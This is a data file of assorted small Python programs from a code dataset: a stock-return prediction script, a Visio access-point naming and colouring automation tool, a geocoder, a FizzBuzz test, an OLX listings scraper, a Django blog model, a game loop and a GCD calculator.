+{"seq_id":"398353934","text":"import os\nimport numpy as np\nimport pandas as pd\nfrom data_loader.data_loader import DataLoader\nfrom tensorflow.keras.models import load_model\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder\n\n\n#GLOBAL VARIABLES\ndata_path = \"..//test_data//temp_predict.csv\"\nmodel_path = \"..//h5 models//run17.h5\"\nwindow=45\nthreshold=0.035\n\ndef load_data(data_path):\n df = pd.read_csv(data_path,low_memory=False,skip_blank_lines=True)\n df = df.drop(['DATE'],axis=1)\n return df\n\ndef process_data(df):\n prices = df['IQ_LASTSALEPRICE'].values.reshape(-1, 1)\n bmark = df['BENCHMARK'].values.reshape(-1, 1)\n\n len = prices.shape[0]\n priceReturns = np.empty((len, 1))\n bmarkReturns = np.empty((len, 1))\n for i in range (0,len-window):\n priceReturns[i] = prices[i+window,0]/prices[i,0]-1\n bmarkReturns[i] = bmark[i+window, 0]/bmark[i, 0] - 1\n\n priceReturns=priceReturns[:-window]\n bmarkReturns=bmarkReturns[:-window]\n relReturns = priceReturns - bmarkReturns\n targets = []\n for ret in relReturns:\n if ret > threshold:targets.append(1)\n elif ret < -threshold:targets.append(-1)\n else: targets.append(0)\n targets = np.array(targets).reshape(-1, 1)\n unique, counts = np.unique(targets, return_counts=True)\n print(\"Target counts are %s %s\", unique, counts)\n\n ohe = OneHotEncoder(categories='auto')\n targets_ohe = ohe.fit_transform(targets).toarray()\n\n print(\"prices:\\n\", prices)\n print(\"priceReturns:\\n\", priceReturns)\n print(\"bmarkReturns:\\n\", bmarkReturns)\n print(\"relReturns:\\n\", relReturns)\n print(\"targets:\\n\", targets)\n print(\"targets_ohe:\\n\", targets_ohe)\n\n return targets_ohe\n\ndef normalize_data(df):\n sc = StandardScaler()\n sc.fit(df.values)\n x_pred = sc.transform(df.values)\n return 
x_pred\n\n\ndef predict_results(model_path):\n dense_model =load_model(model_path)\n pred_results = dense_model.predict(x_pred)\n np.savetxt(\"..//test_data//prediction_results.csv\",pred_results,delimiter=\",\")\n print(\"pred:\\n\", pred_results)\n return pred_results\n\nif __name__ == '__main__':\n df = load_data(data_path)\n # targets_ohe = process_data(df)\n x_pred = normalize_data(df)\n print(x_pred)\n pred_results = predict_results(model_path)\n\n\n\n","sub_path":"predictor/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"217552334","text":"import keyboard, openpyxl, pyautogui, tkinter, time, sys, os, datetime\r\nfrom tkinter import filedialog, messagebox, Tk\r\nfrom openpyxl import Workbook, load_workbook\r\nfrom guizero import App, Text, TextBox, PushButton, Window\r\n\r\n\r\n\r\nglobal siteName\r\nglobal apPrefix\r\nglobal apNumber\r\nglobal apName\r\nglobal excelCount\r\nglobal excelNumber\r\nglobal rowLetter\r\nglobal rowNumber\r\nglobal rowWholeName\r\nglobal list\r\nglobal excelName\r\nglobal formatNumber\r\nglobal excelStartingInteger\r\nglobal keyPress\r\n\r\nsiteName = str ('Paul')\r\napPrefix = siteName + '-XX-'\r\napNumber = int('1')\r\napName = str(apPrefix) + str(apNumber)\r\nexcelCount = int('1')\r\nexcelNumber = int('1')\r\nrowLetter = 'A'\r\nrowNumber = int('1')\r\n\r\nrowWholeName = str(rowLetter) + str(rowNumber)\r\nlist=[99999]\r\nexcelName = 'Paul'\r\nformatNumber = format(apNumber, '05')\r\nexcelStartingInteger = int('1')\r\ncurrentTime = datetime.datetime.now().strftime(\"%Y-%m-%d %H.%M.%S\")\r\n\r\n\r\ndef startWorkbook ():#Starts an excel. Required for visioTool.\r\n global wb\r\n wb = Workbook()\r\n global ws\r\n ws = wb.active\r\n\r\ndef openFiles():#Opens file explorer\r\n global excelName\r\n #Tk().withdraw() # We don't want a full GUI, so keep the root window from appearing\r\n excelName = filedialog.askopenfilename() # Show an \"Open\" dialog box and return the path to the selected file\r\n print(excelName)\r\n print('')\r\n\r\ndef pause(): #Pause logic\r\n keyPress = keyboard.read_key()\r\n if keyPress == 'pause': #Reads if pause button has been pressed and unpauses\r\n print('Unpaused')\r\n time.sleep(.3)\r\n exit\r\n else: #If pause has not been pressed then loop repeats infinitely WOO\r\n pause()\r\n \r\ndef theGUI(): #all the GUI stuff\r\n print('')\r\n print('Start of Visio Tool')\r\n def apStartingNumber(): # part of GUI that allows changing of the starting AP number\r\n global apNumber\r\n global formatNumber\r\n apNumber = int(startingNumber.value)\r\n formatNumber = format(apNumber, '05')\r\n print ('AP number changed to ' + str(apNumber))\r\n changingText.value = \"AP number changed to \" + str(apNumber) #Text for changing AP number\r\n\r\n def changeSiteName(): # part of GUI that allows changing of the site name\r\n global siteName\r\n global apPrefix\r\n global apName\r\n siteName = str(siteNames.value)\r\n apPrefix = siteName + '-XX-'\r\n apName = str(apPrefix) + str(apNumber)\r\n print('Site name changed to ' + siteName)\r\n changingText.value = \"Site changed to \" + siteName #Text for changing site name\r\n \r\n def directions(): #Once \"Go?\" has been pressed execute the following items\r\n startWorkbook()\r\n openFiles()\r\n app.hide()\r\n visioLoop()\r\n python = sys.executable #Restarts the whole program\r\n os.execl(python, python, * sys.argv) #Restarts the whole program\r\n \r\n app = App(title = 
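One caveat about normalize_data in the prediction script above: it fits a fresh StandardScaler on the prediction data itself, so features are centered and scaled with statistics the trained model never saw. The usual practice is to persist the scaler fitted on the training set and only transform at prediction time; a hedged sketch with joblib (the file name is hypothetical):

import joblib

# At training time (elsewhere): sc = StandardScaler().fit(x_train); joblib.dump(sc, "scaler.joblib")
sc = joblib.load("scaler.joblib")    # reuse the training-time statistics
x_pred = sc.transform(df.values)     # transform only; never refit on prediction data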
\"Phoenix_Oath\", width=352, height=132, layout='grid')\r\n\r\n button7 = PushButton(app, text = \"Go?\", command = directions, grid=[2,3])\r\n\r\n #Logic for changing starting AP number\r\n startingNumberText = Text(app, text=\"AP Number?\", align=\"left\", grid=[0,1]) #Text asks for AP number\r\n startingNumber = TextBox(app, align=\"right\",text = \"1\", width=30, grid=[1,1]) #Text box for data entry\r\n button4 = PushButton(app, text = \"Confirm\", command = apStartingNumber, grid=[2,1])\r\n\r\n #Logic for changing site name\r\n siteNamesText = Text(app, text=\"Site Name?\", align=\"left\", grid=[0,2]) #Text asks for site name\r\n siteNames = TextBox(app, align=\"right\",text = \"PAUL\", width=30, grid=[1,2]) #Text box for data entry\r\n button6 = PushButton(app, text = \"Confirm\", command = changeSiteName, grid=[2,2])\r\n\r\n changingText = Text(app,text=\"War has changed\", align =\"left\", grid=[1,3])\r\n app.display() # initiates the GUI. Allowing it to be used\r\n \r\ndef saveExcel(): # saves Visio Tool names to Excel\r\n global displayText\r\n global excelName\r\n wb.save(excelName) # Saves workbook\r\n print ('')\r\n print ('Worksheet saved')\r\n print ('End of Visio Tool')\r\n \r\ndef visioGuts(): # the internals to the Visio Tool. Determines how most of the program is run\r\n global apNumber\r\n global formatNumber\r\n global excelStartingInteger\r\n print (apName)\r\n ws.cell(excelStartingInteger, 1, apName) #writes in excel **format** ->(row, column, content to be written in cell)\r\n pyautogui.press('backspace'); pyautogui.typewrite(str(formatNumber)) # takes control of keyboard. hits backspace and types AP number\r\n apNumber += 1 #increments ap number up by 1\r\n excelStartingInteger += 1 # Increments Excel cell to be written in\r\n formatNumber = format(apNumber, '05') # Modifies apNumber by adding up to 5 zeros in front\r\n\r\ndef visioLoop():\r\n global apNumber\r\n global formatNumber\r\n global excelStartingInteger\r\n global apName\r\n while True:\r\n keyPress = keyboard.read_key() #reads ALL keypress's and saves to variable\r\n \r\n if keyPress == '`' : #Adds a Default Ap to cutsheet\r\n apName = str(apPrefix) + str(formatNumber)\r\n visioGuts ()\r\n \r\n elif keyPress == 's': #Adds a Standup Ap to cutsheet\r\n apName = str(apPrefix) + str(formatNumber) + 'S'\r\n visioGuts ()\r\n \r\n elif keyPress == 'g' : #Adds a Guard Shack Ap to cutsheet\r\n apName = str(apPrefix) + str(formatNumber) + 'G'\r\n visioGuts ()\r\n \r\n elif keyPress == 'm' : #Adds a MOD/KIVA Ap to cutsheet\r\n apName = str(apPrefix) + str(formatNumber) + 'M'\r\n visioGuts ()\r\n \r\n elif keyPress == 'h' : #Adds a High Racking Ap to cutsheet\r\n apName = str(apPrefix) + str(formatNumber) + 'H'\r\n visioGuts ()\r\n \r\n elif keyPress == 'd' : #Adds a Door Ap to cutsheet\r\n apName = str(apPrefix) + str(formatNumber) + 'D'\r\n visioGuts ()\r\n\r\n elif keyPress == 'e' : #Adds a External Ap to cutsheet\r\n apName = str(apPrefix) + str(formatNumber) + 'E'\r\n visioGuts ()\r\n \r\n elif keyPress == '[': #goes down one ap number.\r\n apNumber -= 1\r\n excelStartingInteger -= 1\r\n formatNumber = format(apNumber, '05')\r\n apName = str(apPrefix) + str(formatNumber)\r\n print (apName + \" fix?\")\r\n time.sleep(.09)\r\n\r\n elif keyPress == ']': #goes up one ap number.\r\n apNumber += 1\r\n excelStartingInteger += 1\r\n formatNumber = format(apNumber, '05')\r\n apName = str(apPrefix) + str(formatNumber)\r\n print (apName + \" fix?\")\r\n time.sleep(.09)\r\n \r\n elif keyPress == 'pause': #Well it pauses 
everthing.....\r\n print('Paused')\r\n time.sleep(.3)\r\n pause() #Program is stuck in the pause loop until pause is pressed again\r\n\r\n elif keyPress == '=': #Saves the CAD Cutsheet and ends the Visio Tool \r\n saveExcel()\r\n exit(0)\r\n\r\n\r\n\r\nclass Options:\r\n def open_audit_sheet (self): #Opens a file explorer and returns path from chosen file\r\n global audit_sheet\r\n Tk().withdraw() # We don't want a full GUI, so keep the root window from appearing\r\n xlname = filedialog.askopenfilename() # Show an \"Open\" dialog box and return the path to the selected file\r\n print(\"Loading Excell File... \")\r\n audit_book = load_workbook(xlname)#Opens Excel\r\n audit_sheet = audit_book['Audit'] #grabs information from the \"audit\" sheet\r\n\r\n def audit_sheet_sorter (self): #reads all AP's from chosen Audit Sheet and categories them by their color\r\n global AP_red_list\r\n global AP_blue_list\r\n global AP_grey_list\r\n global AP_orange_list\r\n \r\n xlname_col = 'A' #column letter to read AP names from\r\n xlname_col_fail = 'K' #column letter to read fails from\r\n xlname_row = int('3') #Starting row in excel\r\n xlname_row_fail = int('3') #Starting row in excel\r\n \r\n AP_red_list = [] #initiates a list for green AP's ('2')\r\n AP_blue_list = [] #initiates a list for green AP's ('4')\r\n AP_grey_list = [] #initiates a list for green AP's ('1')\r\n AP_orange_list = [] #initiates a list for green AP's ('3')\r\n \r\n AP_red_count_list = int('0')#Keeps track how long the list is\r\n AP_blue_count_list = int('0')\r\n AP_grey_count_list = int('0')\r\n AP_orange_count_list = int('0') \r\n \r\n print(\"List of AP ID's:\")\r\n for AP in range (0, audit_sheet.max_row +1): #range of APS being colored\r\n xlname_col_fail_num = str(xlname_col_fail) + str(xlname_row_fail)\r\n xlname_col_num = str(xlname_col) + str(xlname_row)\r\n cell_value1 = audit_sheet[xlname_col_fail_num]\r\n cell_value2 = audit_sheet[xlname_col_num]\r\n AP_fail = cell_value1.value\r\n AP_ID = cell_value2.value\r\n \r\n if AP_fail == 1: #reads all green AP's\r\n AP_grey_list.append(AP_ID)\r\n print(AP_grey_list[AP_grey_count_list])\r\n AP_grey_count_list += 1\r\n\r\n elif AP_fail == 2: #reads all red AP's\r\n AP_red_list.append(AP_ID)\r\n print(AP_red_list[AP_red_count_list])\r\n AP_red_count_list += 1\r\n \r\n elif AP_fail == 3: #reads all orange AP's\r\n AP_orange_list.append(AP_ID)\r\n print(AP_orange_list[AP_orange_count_list])\r\n AP_orange_count_list += 1\r\n \r\n elif AP_fail == 4: #reads all blue AP's\r\n AP_blue_list.append(AP_ID)\r\n print(AP_blue_list[AP_blue_count_list])\r\n AP_blue_count_list += 1\r\n\r\n elif AP_fail == 5: #reads all red and orange AP's\r\n AP_red_list.append(AP_ID)\r\n print(AP_red_list[AP_red_count_list])\r\n AP_red_count_list += 1\r\n AP_orange_list.append(AP_ID)\r\n print(AP_orange_list[AP_orange_count_list])\r\n AP_orange_count_list += 1\r\n\r\n elif AP_fail == 6: #reads all red and blue AP's\r\n AP_red_list.append(AP_ID)\r\n print(AP_red_list[AP_red_count_list])\r\n AP_red_count_list += 1\r\n AP_blue_list.append(AP_ID)\r\n print(AP_blue_list[AP_blue_count_list])\r\n AP_blue_count_list += 1\r\n\r\n elif AP_fail == 7: #reads all orange and blue AP's\r\n AP_orange_list.append(AP_ID)\r\n print(AP_orange_list[AP_orange_count_list])\r\n AP_orange_count_list += 1\r\n AP_blue_list.append(AP_ID)\r\n print(AP_blue_list[AP_blue_count_list])\r\n AP_blue_count_list += 1\r\n\r\n else:\r\n print('End of Audit Sheets')\r\n break \r\n xlname_row_fail += 1\r\n xlname_row += 1\r\n print(f'Grey APs: 
{AP_grey_count_list} ')\r\n print(f'Red APs: {AP_red_count_list} ')\r\n print(f'Blue APs: {AP_blue_count_list} ')\r\n print(f'Orange APs: {AP_orange_count_list}')\r\n\r\n def search_options (self): #sets visio to search all pages for AP IDs, must be done before coloring\r\n print (\"\\nStarting Search...\")\r\n pyautogui.hotkey('ctrl', 'f')\r\n pyautogui.press(['tab','tab'])\r\n pyautogui.press('down')\r\n pyautogui.press('esc')\r\n \r\n\r\n #def font_white(self): \r\n #time.sleep(.05)\r\n #pyautogui.hotkey('alt', 'h')\r\n #pyautogui.hotkey('f', 'c')\r\n #pyautogui.press(['down','left','left','left','left','left','enter'])\r\n #print(\"Font set to white\")\r\n\r\n def auto_script_grey(self): #finds AP name in Visio and colors it GREEN,\r\n Options.search_options(self)\r\n AP_grey_count = 0\r\n for x in AP_grey_list: \r\n AP_num = AP_grey_list[AP_grey_count]\r\n AP_num_print = (AP_num[8:13]) if len(AP_num) > 5 else AP_num #Truncates site name, IDF, and AP letter.\r\n print(AP_num_print)\r\n pyautogui.hotkey('ctrl', 'f')\r\n pyautogui.typewrite(AP_num_print)\r\n pyautogui.press(['enter', 'esc','esc','tab','enter'])\r\n pyautogui.hotkey('shift','tab','enter')\r\n pyautogui.hotkey('shift','tab','enter')\r\n pyautogui.hotkey('alt', 'h')#line coloring\r\n pyautogui.press(['l','down','down','down','down','down','left','left','left','enter'])\r\n pyautogui.hotkey('alt', 'h')#fill coloring\r\n pyautogui.press(['i','down','down','down','down','down','left','left','left','enter'])\r\n AP_grey_count += 1 #adds one to total grey count\r\n print(f'Grey APs: {AP_grey_count}')\r\n\r\n def auto_script_red(self): #finds AP name in Visio and colors it RED, \r\n Options.search_options(self) \r\n AP_red_count = 0\r\n for x in AP_red_list: #finds AP name in Visio and colors it\r\n AP_num = AP_red_list[AP_red_count]\r\n AP_num_print = (AP_num[8:13]) if len(AP_num) > 5 else AP_num #Truncates site name, IDF, and AP letter.\r\n print(AP_num_print)\r\n pyautogui.hotkey('ctrl', 'f')\r\n pyautogui.typewrite(AP_num_print)\r\n pyautogui.press(['enter', 'esc','esc','tab','enter'])\r\n pyautogui.hotkey('shift','tab','enter')\r\n pyautogui.hotkey('shift','tab','enter')\r\n pyautogui.hotkey('alt', 'h')#line coloring\r\n pyautogui.press(['l','down','down','down','down','down','down','down','left','left','left','left','enter'])\r\n pyautogui.hotkey('alt', 'h')#fill coloring\r\n pyautogui.press(['i','down','down','down','down','down','down','down','left','left','left','left','enter'])\r\n #Options.font_white(self)\r\n AP_red_count += 1 #adds one to total red count\r\n print(f'Red APs: {AP_red_count}')\r\n\r\n def auto_script_orange(self): #finds AP name in Visio and colors it ORANGE,\r\n Options.search_options(self)\r\n AP_orange_count = 0\r\n for x in AP_orange_list: #finds AP name in Visio and colors it\r\n AP_num = AP_orange_list[AP_orange_count]\r\n AP_num_print = (AP_num[8:13]) if len(AP_num) > 5 else AP_num #Truncates site name, IDF, and AP letter.\r\n print(AP_num_print)\r\n pyautogui.hotkey('ctrl', 'f')\r\n pyautogui.typewrite(AP_num_print)\r\n pyautogui.press(['enter', 'esc','esc','tab','enter'])\r\n pyautogui.hotkey('shift','tab','enter')\r\n pyautogui.hotkey('shift','tab','enter')\r\n pyautogui.hotkey('alt', 'h')#line coloring\r\n pyautogui.press(['l','down','down','down','down','down','down','down','left','left','left','enter'])\r\n pyautogui.hotkey('alt', 'h')#fill coloring\r\n pyautogui.press(['i','down','down','down','down','down','down','down','left','left','left','enter'])\r\n #Options.font_white(self)\r\n 
AP_orange_count += 1 # adds one to total orange count\r\n print(f'Orange APs: {AP_orange_count}')\r\n\r\n def auto_script_blue(self): #finds AP name in Visio and colors it BLUE,\r\n Options.search_options(self)\r\n AP_blue_count = 0\r\n for x in AP_blue_list: \r\n AP_num = AP_blue_list[AP_blue_count]\r\n AP_num_print = (AP_num[8:13]) if len(AP_num) > 5 else AP_num #Truncates site name, IDF, and AP letter.\r\n print(AP_num_print)\r\n pyautogui.hotkey('ctrl', 'f')\r\n pyautogui.typewrite(AP_num_print)\r\n pyautogui.press(['enter', 'esc','esc','tab','enter'])\r\n pyautogui.hotkey('shift','tab','enter')\r\n pyautogui.hotkey('shift','tab','enter')\r\n pyautogui.hotkey('alt', 'h')#line coloring\r\n pyautogui.press(['l','down','down','down','down','down','down','down','right','enter'])\r\n pyautogui.hotkey('alt', 'h')#fill coloring\r\n pyautogui.press(['i','down','down','down','down','down','down','down','right','enter'])\r\n #Options.font_white(self)\r\n AP_blue_count += 1 #adds one to total blue count\r\n print(f'Blue APs: {AP_blue_count}')\r\n \r\n #def auto_script_total(self):\r\n #print(f'Total APs: ')\r\n #print(f'Total Failed APs:')\r\n\r\n def save_new_sheet(self): #Pop-up message box, asks if user wants to save sorted date to new excell file/sheet\r\n result = messagebox.askyesno(\"Visio AP Coloring Tool\",\"Do you want to save data in new Excell?\")\r\n print(result)\r\n if result == True:\r\n print(\"data saved in 'New File'\")\r\n \r\n else:\r\n pass\r\n\r\n\r\nclass AutoColor(tkinter.Frame): #POP-UP GUI for choosing majority of Sheets color\r\n def __init__(self, master=None):\r\n super().__init__(master)\r\n self.master = master\r\n self.pack()\r\n self.create_widgets()\r\n\r\n def create_widgets(self): #buttons in the GUI\r\n self.title = tkinter.Label(self, font = 30, text = \"Select a color to highlight:\")\r\n self.title.pack(side = \"top\", pady = 30)\r\n\r\n self.option1 = tkinter.Button(self, fg = \"grey\") #Button, colored green\r\n self.option1[\"text\"] = \"Grey\" #button, named green\r\n self.option1[\"command\"] = self.output1 #when button pressed, execute output1\r\n self.option1.pack(side=\"top\") #position selt at top most position\r\n self.option2 = tkinter.Button(self, text = \"Red\", fg = \"red\", command = self.output2).pack(side=\"top\")\r\n self.option3 = tkinter.Button(self, text = \"Orange\", fg = \"orange\", command = self.output3).pack(side=\"top\")\r\n self.option4 = tkinter.Button(self, text = \"Blue\", fg = \"blue\", command = self.output4).pack(side=\"top\")\r\n self.quit = tkinter.Button(self, text=\"QUIT\", command=self.close)\r\n self.quit.pack(side=\"bottom\", pady = 30)\r\n\r\n def output1(self): #colors all green\r\n print(\"Coloring all GREY APs...\")\r\n print(\"QUICK! You have 5 seconds to click into your visio file!!!\\n\")\r\n time.sleep(5)\r\n Options.auto_script_grey(self) \r\n #self.close()\r\n\r\n def output2(self): #colors all red\r\n print(\"Coloring all RED APs...\")\r\n print(\"QUICK! You have 5 seconds to click into your visio file!!!\\n\")\r\n time.sleep(5)\r\n #Options.font_white(self) \r\n Options.auto_script_red(self)\r\n #self.close()\r\n\r\n def output3(self): #colors all orange\r\n print(\"Coloring all ORANGE APs...\")\r\n print(\"QUICK! You have 5 seconds to click into your visio file!!!\\n\")\r\n time.sleep(5) \r\n # Options.font_white(self) \r\n Options.auto_script_orange(self) \r\n #self.close()\r\n\r\n def output4(self): #colors all blue\r\n print(\"Coloring all BLUE APs...\")\r\n print(\"QUICK! 
You have 5 seconds to click into your visio file!!!\\n\")\r\n time.sleep(5)\r\n #Options.font_white(self) \r\n Options.auto_script_blue(self) \r\n #self.close()\r\n \r\n def close(self): #Ends the program when the user selects \"QUIT\"\r\n print(\"Closing program... Have a nice day :)\")\r\n time.sleep(1)\r\n exit(0)\r\n\r\n\r\ndef main():\r\n #choice = \"\" #creates a blank string for user input\r\n keyPress = \"\"\r\n #while choice != \"3\": \r\n while keyPress != \"p\": \r\n print(\"Enter '[' to open Visio AP Naming tool\")\r\n print(\"Enter ']' to open Visio AP Coloring tool\")\r\n print(\"Enter 'p' to quit program\\n\")\r\n #choice = input(\">>> \")\r\n keyPress = keyboard.read_key()\r\n print(keyPress)\r\n if keyPress == \"[\":\r\n print(\"Starting Visio Naming Tool...\") \r\n \r\n theGUI()\r\n\r\n #vnt.theGUI() #the GUI function calls these internally:\r\n break #vnt.startWorkbook() \r\n #vnt.openFiles()\r\n #vnt.visioLoop()\r\n #vnt.visioGuts()\r\n #vnt.saveExcel() \r\n elif keyPress == \"]\":\r\n #AutoColor Tool\r\n print(\"Starting Visio Color Tool...\")\r\n start = Options()\r\n start.open_audit_sheet()\r\n start.audit_sheet_sorter()\r\n root = tkinter.Tk()\r\n A_C = AutoColor(master=root)\r\n A_C.master.title(\"Visio AP Coloring Tool\")\r\n A_C.mainloop()\r\n break\r\n \r\n else:\r\n print(\"Invalid input\")\r\n pass\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main() #this is the call to run the whole program\r\n\r\n\r\n###Instead of coloring passed APs Green, now they are GREY\r\n#respective variables changed to accommodate grey coloring\r\n#added new functionality to change the font to white after selecting and filling the failed APs\r\n#this is because the font won't default to White, it will be the new Grey color scheme\r\n#added full code of the V.N.T. 
into the combo script, no more calls to outside files","sub_path":"Combo Script 2.2.0/Combo Script 2.2.py","file_name":"Combo Script 2.2.py","file_ext":"py","file_size_in_byte":21317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"161151240","text":"from geopy.geocoders import Here, Nominatim\nimport ssl\n\nimport json\nimport time\n\nfile = open(r\"/Library/WebServer/Documents/JSConferences/data2019.json\", \"r\", encoding=\"utf-8\")\ndata = json.load(file)\nfeatures = data[\"features\"]\n\ngeojsonFeatures = []\n\nwhile len(features) > 0:\n feat = features.pop(0)\n address = feat[\"city\"] + \"+\" + feat[\"country\"]\n print(address)\n #geolocator = Nominatim(user_agent=\"Ralucas-app\", ssl_context= ssl.SSLContext())\n geolocator = Here(app_id=\"\", app_code=\"\", ssl_context= ssl.SSLContext())\n location = geolocator.geocode(address)\n if location is not None:\n geojsonFeature = {\n \"type\": \"Feature\",\n \"properties\": feat,\n \"geometry\": {\n \"type\": \"Point\",\n \"coordinates\": [\n location.longitude,\n location.latitude\n ]\n }\n }\n geojsonFeatures.append(geojsonFeature)\n print(geojsonFeature)\n time.sleep(5)\n print(\"------------------\")\ngeojson = {\n \"type\": \"FeatureCollection\",\n \"features\": geojsonFeatures\n}\n\nprint(geojson)\n","sub_path":"geocode.py","file_name":"geocode.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"371526836","text":"import unittest\nimport fizz_buzz\n\nfb = dict()\nfb[1] = 1\nfb[3] = \"Fizz\"\nfb[5] = \"Buzz\"\nfb[15] = \"FizzBuzz\"\n\n\nclass TestFizzBuzz(unittest.TestCase):\n def test_case(self):\n for k, v in fb.items():\n self.assertEqual(v, fizz_buzz.get_fizz_buzz(k))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test_module.py","file_name":"test_module.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"142016128","text":"#Import libraries\nimport pandas as pd\nimport numpy as np #needed for np.nan used in parse_olx below\nfrom bs4 import BeautifulSoup\nimport requests\nimport seaborn as sns\nfrom datetime import datetime, timedelta\nsns.set_style(\"whitegrid\")\n\n#Days of the month used to replace the strings \"dzisiaj\" (today) and \"wczoraj\" (yesterday)\ntoday = str(datetime.today().day)\nyesterday = str((datetime.today()-timedelta(1)).day)\n\n\n\n#Function for apply - prepends a 0 to single-digit days\ndef daty_naprawa(row):\n if len(row) == 5:\n return \"0\" + str(row)\n else:\n return row\n \n \n#Function counting the number of result pages for the searched item\ndef count_pages(url):\n request = requests.get(url).text\n soup = BeautifulSoup(request, 'html.parser')\n pages = []\n last_page = soup.find_all(\"a\", {\"class\":\"block br3 brc8 large tdnone lheight24\"})\n for x in last_page:\n pages.append(x.get_text(strip=True))\n return int(pages[-1])\n\n#Parser for a single results page of the searched item\ndef olx_page_parser(url):\n request = requests.get(url).text\n soup = BeautifulSoup(request, 'html.parser')\n #Listing titles\n titles_list = []\n h3 = soup.find_all(\"h3\", {\"class\":\"lheight22 margintop5\"})\n for x in h3:\n titles_list.append(x.find('a').get_text(strip=True))\n \n #Prices\n prices_list = []\n prices = soup.find_all(\"p\", {\"class\":\"price\"})\n for x in prices:\n prices_list.append(x.get_text(strip=True))\n \n #Locations\n locations_list = []\n locations = soup.find_all(\"small\", {\"class\" : \"breadcrumb x-normal\"})\n i 
= 0\n for x in locations:\n try:\n if i % 2 == 0:\n locations_list.append(x.find('span').get_text(strip=True))\n i+=1\n except AttributeError:\n pass\n \n #Listing publication dates\n dates_list = []\n dates = soup.find_all(\"small\", {\"class\" : \"breadcrumb x-normal\"})\n i = 1\n for x in dates:\n if i % 3 == 0:\n dates_list.append(x.get_text(strip=True))\n i+=1\n \n #Build a DataFrame from the lists\n df = pd.DataFrame({'Tytul' : titles_list,\n 'Cena': prices_list,\n 'Lokalizacja': locations_list,\n 'Data dodania' : dates_list})\n return df\n\n#Crawl the result pages and process the dates\ndef parse_olx(url, filename):\n pages = count_pages(url)\n df = pd.DataFrame()\n #Loop - scrape every results page of the searched item\n for page in range (1, pages):\n print(\"Scraping page \" + str(page))\n new_url = url + \"?page=\" + str(page)\n df_page = olx_page_parser(new_url)\n df = df.append(df_page)\n df = df.drop_duplicates()\n #Fix up the dates\n df[\"Data dodania\"] = df[\"Data dodania\"].apply(daty_naprawa)\n df[\"Data dodania\"] = df[\"Data dodania\"].replace({\"dzisiaj\" : today+\" lut\", \"wczoraj\" : yesterday+\" lut\"}, regex=True)\n df[\"Data dodania\"] = df[\"Data dodania\"].apply(lambda x: x.split()[0:2])\n df[\"Data dodania\"] = df[\"Data dodania\"].apply(lambda x: ' '.join(x))\n df[\"Data dodania\"] = df[\"Data dodania\"].replace({\"sty\" : \"/01\", \"lut\" : \"/02\"}, regex=True)\n df[\"Data dodania\"] = '2020/' + df[\"Data dodania\"]\n df[\"Data dodania\"] = df[\"Data dodania\"].replace({\" \": \"\"}, regex=True)\n df[\"Data dodania\"] = pd.to_datetime(df[\"Data dodania\"], format='%Y/%d/%m')\n df = df.sort_values(by='Data dodania')\n df = df.set_index([\"Data dodania\"]) \n #Convert the price to a numeric value\n df[\"Cena\"] = df[\"Cena\"].replace({\" zł\" : \"\", \"Zamienię\" : np.nan, \" \" : \"\", \",\" : \".\"}, regex=True)\n df[\"Cena\"] = df[\"Cena\"].astype(float)\n #Save to an xlsx file\n df.to_excel(filename+\".xlsx\")\n return df","sub_path":"olx_parser.py","file_name":"olx_parser.py","file_ext":"py","file_size_in_byte":3651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"570810807","text":"from django.db import models\nfrom ckeditor_uploader.fields import RichTextUploadingField\nfrom django.contrib.auth.models import User\n\n\nclass BlogPost(models.Model):\n title = models.CharField(max_length=10000, default='')\n content = RichTextUploadingField(blank=True, null=True)\n image = models.ImageField(upload_to='img/blog/')\n datetime = models.DateTimeField(auto_now_add=True)\n user = models.ForeignKey(User, default=None, null=True, on_delete=models.SET_DEFAULT)\n\n class Meta:\n ordering = ['-datetime']\n","sub_path":"russianseasons/models/BlogPost.py","file_name":"BlogPost.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"232838900","text":"from ArtificialAgent import ArtificialAgent\nfrom Display import Display\nfrom HumanAgent import HumanAgent\nfrom State import State\n\n\nclass Game:\n display = None\n\n def __init__(self, n, m, g, nhp, abdepth, display=True):\n self.n, self.m, self.g = n, m, g\n self.agents = [ArtificialAgent(i, n, m, abdepth) if nhp > i else HumanAgent(i) for i in range(1, -1, -1)]\n if display:\n self.display = Display(n, m, g)\n self.display.startupdateloop()\n self.state = State(n, m, g)\n\n def play(self):\n done = False\n while not done:\n for agent in self.agents:\n move = 
agent.play(self.state)\n self.state.add(move)\n if self.display: #display stays None when constructed with display=False\n self.display.addmove(move)\n if self.state.finished():\n print('done')\n done = True\n break\n","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"604224851","text":"number1 = int(input('enter first number : '))\nnumber2 = int(input('enter second number : '))\n\n\ndef gcd(a, b):\n \n if a > b:\n small = b\n else:\n small = a\n for i in range(1, small+1):\n if((a % i == 0) and (b % i == 0)):\n gcd = i\n \n return gcd\n \n\n \nprint (\"The gcd of {} and {} is : {} \".format(number1,number2,gcd(number1,number2)))\n","sub_path":"7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
